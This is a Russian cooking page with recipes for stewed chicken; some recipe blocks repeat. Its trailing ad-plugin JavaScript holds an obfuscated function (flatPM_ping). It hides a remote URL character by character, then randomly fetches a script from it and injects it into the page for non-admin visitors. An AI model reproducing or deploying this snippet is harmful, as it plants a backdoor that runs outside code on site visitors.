Тушеная курица

Тушеная курица: рецепты с фото

Мягкость и сочность мяса курицы, которую потушили в сковороде, кастрюле или духовке, по достоинству оценит каждый член вашей семьи. Вы можете насытить вкус остротой или сладостью, придать пикантный чесночный аромат или приятную пряность хмели-сунели, добавить к мясным кусочкам овощи или каши – вариантов приготовления бесчисленное множество.

Как потушить курицу

Сделать куриное мясо сочным и невероятно мягким кулинары предлагают с помощью тушения. Для такой тепловой обработки часто используются соусы: томатный, сливочный или любой другой. Диетическое мясо полностью раскрывает свой вкус, сохраняет нежность, а тушить курицу просто. Для процесса можно воспользоваться кастрюлей с толстым дном, сковородой, мультиваркой, духовкой. В каждом случае блюдо сохранит максимум пользы и приобретет приятный вкус.

На сковороде

Для тушения на сковороде отдайте предпочтение свежей, не замороженной птице. От правильно выбранного мяса зависит итоговый вкус. Молодая курочка не слишком большого размера – лучший выбор. Если вы решили потушить курицу на сковороде, то выбирайте толстостенную посуду, например, чугунную. Растительного масла для готовки понадобится чуть-чуть, так как из курицы будет вытекать жир.

В мультиварке

Современная мультиварка может превратить птицу в великолепное лакомство. Тушить курицу в мультиварке можно целиком и кусочками, использовать только мясной ингредиент или добавить к нему овощи, каши. Если вы хотите получить насыщенный аромат готового продукта, обжарьте курицу перед тушением. Даже не слишком молодая домашняя курочка в мультиварке станет мягкой и нежной, но при таком виде мяса время готовки придется увеличить.

В кастрюле

Для приготовления тушеной птицы лучше всего использовать кастрюлю, у которой толстое дно. В такой посуде можно сразу обжаривать мясные кусочки и не пачкать сковороду. Тушеная курица в кастрюле готовится около часа, но в каждом случае лучше проверить мясо на мягкость. Кулинары советуют добавлять соль в конце готовки, чтобы максимально сохранить сочность и аромат блюда.

В духовке

Несколько секретов помогут превратить куриные кусочки с помощью духового шкафа в кулинарный шедевр. Размеры кусочков зависят от вида блюда. Если по рецепту тушится только мясо, то можно сделать их покрупнее. При готовке куры с овощами лучше сделать куски не намного больше других составляющих. Курица тушеная в духовке может готовиться в керамической, стеклянной, чугунной или металлической посуде. Некоторые хозяйки предпочитают использовать для готовки горшочки, в которых помимо мяса укладывается и любимый гарнир: крупы картофель или другие овощи.

Тушеная курица – рецепт

Классический рецепт тушеной курицы придется по вкусу гурманам, которые смогут почувствовать удивительную сочность и нежность птичьего мяса, пропитанного соком помидор и вином. Вы можете отказаться от чеснока, заменить красное вино на белое, от этого блюдо не станет хуже, а приобретет новые вкусовые нотки. В случае, когда калорийность продукта нужно снизить, уберите кожицу с курицы до начала готовки.

В сметане

  • Время приготовления: 70-90 мин.
  • Количество порций: 4-5 персон.
  • Калорийность блюда: 185 ккал.
  • Предназначение: на обед.
  • Кухня: русская.
  • Сложность приготовления: простая.

Один из любимых домашних рецептов многих хозяек – курица тушеная в сметане. Готовить ее очень просто, способ быстрый, а блюдо придется по нраву детям и взрослым. В результате получаются сочные куриные кусочки и сметанный соус, которые станет лучшим дополнением к гарниру. Используйте домашнюю или фабричную тушку, куриные окорока или бедрышки, даже тушеное куриное филе станет сочным, нежным благодаря сметане.

  • мясо куры – 1 кг;
  • луковицы – 2 шт.;
  • сметана – 250 мл;
  • чесночные зубцы – 3-4 шт.;
  • лавровый лист – 2 шт.;
  • вода или бульон – 100 мл;
  • перец горошком – 5 шт.;
  • хмели-сунели – 1 ч.л.;
  • масло постное – для жарки;
  • соль, черный молотый перец – по вкусу.
  1. Разрежьте птицу на кусочки небольшого размера
  2. Посолите, поперчите кусочки, обжарьте на сковороде.
  3. Лук разрежьте на полукольца.
  4. Возьмите сотейник с толстым дном. Поместите в кастрюлю мясо, лук, перец и лаврушку. Залейте содержимое сотейника сметаной и водой (бульоном).
  5. Тушите мясо минут 30 на слабом огне, закрыв крышкой, затем добавьте хмели-сунели, чеснок, перемешивать нужно тщательно, чтобы каждый кусочек пропитался специями.
  6. Домашнюю курицу нужно тушить еще 40 минут, для фабричной птицы это время можно сократить.
  7. Во время тушения контролируйте количество жидкости, при ее испарении добавляйте чуть-чуть горячей воды.

С овощами

  • Время приготовления: 40 мин.
  • Количество порций: 5-6 персон.
  • Калорийность блюда: 88 ккал.
  • Предназначение: на ужин.
  • Кухня: русская.
  • Сложность приготовления: простая.

Красивое, сочное, вкусное, ароматное блюдо, при этом сытное и полезное – это курица тушеная с овощами. Такая тушеная куриная грудка станет любимым угощением для всей семьи. Использование в рецепте филе не обязательно, его можно заменить на голени, дешевые крылышки или любые другие части. Овощи в блюде можно менять на другие. В результате тушение курицы всякий раз проводится по-разному.

  • филе курицы – 600 г;
  • лук – 1 штука;
  • морковка – 1 шт.;
  • капуста цветная – 400 г;
  • сладкий перец – 1 шт.;
  • томаты – 2 шт.;
  • чесночные зубцы – 2 шт.;
  • вода – 300 мл;
  • масло для жарки – 3-4 ст.л.;
  • укроп – половина пучка;
  • соль, перец, куриная приправа – по вкусу.
  1. Промойте и нарежьте куриное филе не слишком мелкими кусками.
  2. Обжарьте их на сковороде до золотистой корочки.
  3. Измельчите лук и морковь, выложите их к мясу, обжаривайте 5 минут.
  4. Перец нарежьте соломкой, помидоры кубиками, цветную капусту разделите на небольшие соцветия.
  5. Соедините на сковороде все овощи с мясом, залейте кипятком. Добавьте специи и тушите 8 минут.
  6. В конце добавьте нарезанный укроп, выдавите чеснок. Тушите еще 3-4 минуты.

Тушеная курица – рецепт

Тушеная курица – это идеальный рецепт для всех начинающих хозяек. Приготовить ее достаточно просто, а получается она восхитительно нежной и вкусной. Такое блюдо прекрасно подойдет к любому гарниру и разнообразит ваш повседневный стол. Давайте же рассмотрим, как приготовить тушеную курицу и сытно накормить всю семью.

Рецепт тушеной курицы в мультиварке

  • курица – 1 шт.;
  • специи;
  • лавровый листик – 4 шт.;
  • приправа для курицы – 1 ст. ложка;
  • чеснок – 3 зубчика.

Курицу хорошенько промываем, разделываем на небольшие порционные кусочки и посыпаем по вкусу приправами для птицы и солью. Чеснок чистим, нарезаем пластинками. Затем пересыпаем куриное мясо лавровым листиком, перцем горошком и чесночком. Выкладываем всё в чашу мультиварки, включаем режим «Тушение» и готовим примерно 1 час. По истечении времени, сочная и ароматная тушёная курочка будет готова.

Рецепт курицы, тушеной с овощами

  • куры – 800 г;
  • красный болгарский перец – 200 г;
  • луковица – 2 шт.;
  • морковь – 1 шт.;
  • чеснок – 2 зубчика;
  • масло растительное – 2 ст. ложки;
  • специи;
  • молотая паприка – по вкусу;
  • свежая зелень петрушки.

Курицу обрабатываем, нарезаем на куски и обжариваем на растительном маслице минут 7, помешивая. Овощи чистим, рубим небольшими ломтиками и добавляем к птице. Приправляем все специями, перемешиваем, вливаем немного воды, накрываем крышкой и тушим 40 минут. Зелень и чесночок мелко рубим, высыпаем в готовое блюдо, перемешиваем и снимаем с огня.

Рецепт тушеной картошки с курицей

  • куриные окорочка – 8 шт.;
  • луковица – 1 шт.;
  • вода – 2 ст.;
  • картошка – 8 шт.;
  • чеснок – 4 зубчика;
  • специи.

Куриные кусочки промываем, выкладываем в чугунок, заливаем водой и ставим на огонь. Доводим до кипения, снимаем шумовкой пену. Чеснок чистим, пропускаем через пресс и добавляем к мясу, подсолив по вкусу. После закипания убавляем огонь и варим 30 минут. Этим временем чистим картофель и лук, шинкуем овощи крупными кубиками и отправляем к курице. Перемешиваем, приправляем молотой паприкой, перчим, накрываем крышкой и готовим еще 15 минут, пока картошка не станет мягкой. Готовую тушеную картошку с курицей украшаем свежей зеленью, и подаем на стол.

Рецепт тушеной капусты с курицей

  • луковица – 1 шт.;
  • белокочанная капуста – 0,5 вилка;
  • свежие грибы – 500 г;
  • помидор – 2 шт.;
  • куриное филе – 600 г;
  • сливки – 100 мл;
  • специи;
  • масло растительное.

С капусты снимаем верхние плохие листья и выбрасываем их. Вилочек промываем, меленько шинкуем. Луковицу чистим от шелухи и рубим кубиками. Грибы обрабатываем, моем, измельчаем небольшими ломтиками. Куриное филе промываем, обсушиваем салфеткой и нарезаем кусочками. Помидоры бланшируем в кипятке и снимаем аккуратно кожицу, а мякоть измельчаем кубиками.

Теперь берем сковороду, ставим ее на плиту, вливаем растительное маслице и разогреваем. Далее бросаем лучок, пассеруем его до мягкости и добавляем грибы. Обжариваем овощи до золотистого цвета, периодически, помешивая.

Готовую обжарку выкладываем в глубокий сотейник, подливаем масла, кладем куриное филе, перемешиваем и готовим 5 минут. Затем добавляем капусту, подливаем немного воды, накрываем крышкой и тушим на слабеньком огне, подсолив и поперчив по вкусу. Когда капуста станет мягкой, бросаем измельченные помидоры, перемешиваем и ждем некоторое время, пока томаты пустят сок. После этого вливаем сливки и тушим 5-10 при слабом кипении. Готовое блюдо раскладываем по тарелкам, посыпаем зеленью и подаем к столу.

Курица тушеная кусочками (рецепт с луком)

Мои родители живут в селе, и выращивают домашних бройлеров. Передают нам, а мы готовим из них различные вкусняшки. Сегодня готовила курицу по маминому рецепту.

Мясо нежное, мягкое, тает во рту. Наши дети обожают с картофелем пюре. Курицу готовить можно разными способами, жарить в сковороде, тушить в кастрюле или казанке, запекать в духовке.

Я тушу с ароматным чесноком и луком, получается вкусная подливка, которая подойдет к гречке, макаронам, и картофелю, и сочное мясо. Его можно кушать с овощами, особенно осенью, когда сезон свежих овощей в самом разгаре.

Кусочки получились аппетитные, ароматные, отлично сочетаются с любым соусом, кетчупом, зеленью. Отлично со свежими или кислыми овощами. Мы мясо любим со сливовым соусом ткемали, готовлю его каждый год.

Курица кусочками с подливкой — самый вкусный рецепт

Получается вкусная и ароматная подлива, к гарниру, и нежнейшие кусочки. По желанию можно присыпать зеленью, свежими или сушеными травами. Аромат будет еще ярче.

Что понадобится:

  • Курица (у меня 2800 грамм)
  • Лук 1-2 шт.
  • Чеснок 3-4 зубчика
  • Лавровый лист 4-6 шт.
  • Перец горошком 4-6 шт.
  • Соль и перец по вкусу
  • растительное масло для жарки

Не пишу точный вес, так как тушка у всех разная, у кого-то килограмм, а у кого-то и все три, разный вес. Лука 1-2 шт. достаточно, чеснока кладите по вкусу.

Вот такая у меня курица, вся соль в том, что мясо не замораживалось, оно свежее и ароматное. Сколько раз брали в магазине, совсем не то, и рядом не лежало, как говорит мой муж.

Курицу разрезаем на части, как шутит наш сын «на запчасти». Я нарезаю кусочками, получается две ножки, два бедра, филе тоже нарезаю на 2-3 кусочка и тушу, можно не тушить. Отложить, например, для запекания, или на отбивные.

Каждый кусочек обжариваю на хорошо разогретой сковороде. Я вливаю немного растительного масла, и выкладываю кусочки в один слой. Когда с одной стороны они поджариваются, жарю их со второй стороны.

Можно сразу солить и перчить мясо. Моя мама даже маринует его перед обжаривание. Она нарезает на кусочки, солит, перчит, добавляет нарезанный лук и чеснок, и оставляет на пару часов. Затем обжаривает.

Пока мясо жарится очищаю лук и чеснок. Лук нарезала полукольцами, а чеснок пластинками. Чеснок, при нарезании отдаст свой непревзойденный аромат и вкус блюду.

Если курица жирная, то жир можно срезать и вытопить, и на нем поджарить кусочки, если нет, то влейте в сковороду немного растительного масла, чтобы кусочки не прилипали при жарке.

Помимо лука, можно взять морковь, болгарский перец, если любите, а нет, можно просто лук и чеснок, и этого достаточно.

Когда кусочки поджарились, я перекладываю их в казан или кастрюлю. Можно тушить курицу в сковородке, но у меня она большая, и такой огромной сковороды нет, поэтому я тушу в казане.

Выкладываю лавровый лист, перец горошком, душистый перец, засыпаю нарезанным луком. Кладите столько, сколько вам нравится. Я еще присыпаю черным молотым перцем.

Кусочки у меня поджаренные, ароматные, супер, вы все сами видите на фотографии. Зажаривать сильно, или не сильно, каждый решает сам.

Если вы любите специи, то с куриным мясом отлично сочетаются: кориандр, укроп, петрушка, корица, имбирь, тмин, тимьян, эстрагон, розмарин, шалфей, майоран, смеси перцев, чеснок, карри.

Можете добавить эти специи, или использовать уже готовые, сейчас они продаются в магазине. Я готовлю так, то для многих, без специй, может показаться «скучновато» и пресно, поэтому, добавьте, что нравится.

Также, обжариваю вторую часть курицы, выкладываю вторым слоем. Посыпаю луком, чесноком и специями. Заливаю водой. Мясо домашнее, жирное, будет еще и ароматная подлива.

Воды можно добавить меньше, например грамм 200-300, в зависимости от того, какой вес у птицы, и как вы любите.

Не обязательно брать курицу, это могут быть бедра, ножки, окорочка. Принцип приготовления тот же.

Довожу до кипения, и делаю небольшой огонь, пусть тушится, нам не нужно чтобы сильно бурлило, все должно тушится на среднем или небольшом огне.

Если вы хотите подливку чуть гуще, в конце тушения, минут за 20, разведите пару ложек муки в холодной воде, и влейте, подливка станет гуще.

Я еще муку поджариваю до темного цвета, она тогда приобретает приятный ореховый аромат. Затем я ее развожу холодной водой, получается однородная масса, можно венчиком, и вливаю тонкой струйкой. Подлива станет гуще.

Сколько по времени тушится курица? Если это домашняя, то 1-1.5 часа, если магазинная, или бройлер от 40 до 50 минут. Мясо готово, когда оно легко прокалывается ножом, и не вытекает красная или розовая жидкость.

Подается птица с любым соусом, со свежими овощами, с квашеными, с любым гарниром. Можно подать как в горячем, теплом, так и в холодном виде.

Если потушить такую тушку, то ее хватит на несколько дней. Хотя, смотря какая у вас семья, и как есть. Можно без гарнира, то уйдет сразу. Подать мясо можно присыпав свежей зелень укропа, петрушки, базилика.

Очень интересно узнать ваши рецепты приготовления курицы кусочками, буду рада попробовать ваш рецепт. Благодарю что дочитали до конца. Приятного аппетита!

Тушеная курица – рецепт

Тушеная курица – это идеальный рецепт для всех начинающих хозяек. Приготовить ее достаточно просто, а получается она восхитительно нежной и вкусной. Такое блюдо прекрасно подойдет к любому гарниру и разнообразит ваш повседневный стол. Давайте же рассмотрим, как приготовить тушеную курицу и сытно накормить всю семью.

Рецепт тушеной курицы в мультиварке

  • курица – 1 шт.;
  • специи;
  • лавровый листик – 4 шт.;
  • приправа для курицы – 1 ст. ложка;
  • чеснок – 3 зубчика.

Курицу хорошенько промываем, разделываем на небольшие порционные кусочки и посыпаем по вкусу приправами для птицы и солью. Чеснок чистим, нарезаем пластинками. Затем пересыпаем куриное мясо лавровым листиком, перцем горошком и чесночком. Выкладываем всё в чашу мультиварки, включаем режим «Тушение» и готовим примерно 1 час. По истечении времени, сочная и ароматная тушёная курочка будет готова.

Рецепт курицы, тушеной с овощами

  • куры – 800 г;
  • красный болгарский перец – 200 г;
  • луковица – 2 шт.;
  • морковь – 1 шт.;
  • чеснок – 2 зубчика;
  • масло растительное – 2 ст. ложки;
  • специи;
  • молотая паприка – по вкусу;
  • свежая зелень петрушки.

Курицу обрабатываем, нарезаем на куски и обжариваем на растительном маслице минут 7, помешивая. Овощи чистим, рубим небольшими ломтиками и добавляем к птице. Приправляем все специями, перемешиваем, вливаем немного воды, накрываем крышкой и тушим 40 минут. Зелень и чесночок мелко рубим, высыпаем в готовое блюдо, перемешиваем и снимаем с огня.

Рецепт тушеной картошки с курицей

  • куриные окорочка – 8 шт.;
  • луковица – 1 шт.;
  • вода – 2 ст.;
  • картошка – 8 шт.;
  • чеснок – 4 зубчика;
  • специи.

Куриные кусочки промываем, выкладываем в чугунок, заливаем водой и ставим на огонь. Доводим до кипения, снимаем шумовкой пену. Чеснок чистим, пропускаем через пресс и добавляем к мясу, подсолив по вкусу. После закипания убавляем огонь и варим 30 минут. Этим временем чистим картофель и лук, шинкуем овощи крупными кубиками и отправляем к курице. Перемешиваем, приправляем молотой паприкой, перчим, накрываем крышкой и готовим еще 15 минут, пока картошка не станет мягкой. Готовую тушеную картошку с курицей украшаем свежей зеленью, и подаем на стол.

Рецепт тушеной капусты с курицей

  • луковица – 1 шт.;
  • белокочанная капуста – 0,5 вилка;
  • свежие грибы – 500 г;
  • помидор – 2 шт.;
  • куриное филе – 600 г;
  • сливки – 100 мл;
  • специи;
  • масло растительное.

С капусты снимаем верхние плохие листья и выбрасываем их. Вилочек промываем, меленько шинкуем. Луковицу чистим от шелухи и рубим кубиками. Грибы обрабатываем, моем, измельчаем небольшими ломтиками. Куриное филе промываем, обсушиваем салфеткой и нарезаем кусочками. Помидоры бланшируем в кипятке и снимаем аккуратно кожицу, а мякоть измельчаем кубиками.

Теперь берем сковороду, ставим ее на плиту, вливаем растительное маслице и разогреваем. Далее бросаем лучок, пассеруем его до мягкости и добавляем грибы. Обжариваем овощи до золотистого цвета, периодически, помешивая.

Готовую обжарку выкладываем в глубокий сотейник, подливаем масла, кладем куриное филе, перемешиваем и готовим 5 минут. Затем добавляем капусту, подливаем немного воды, накрываем крышкой и тушим на слабеньком огне, подсолив и поперчив по вкусу. Когда капуста станет мягкой, бросаем измельченные помидоры, перемешиваем и ждем некоторое время, пока томаты пустят сок. После этого вливаем сливки и тушим 5-10 при слабом кипении. Готовое блюдо раскладываем по тарелкам, посыпаем зеленью и подаем к столу.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};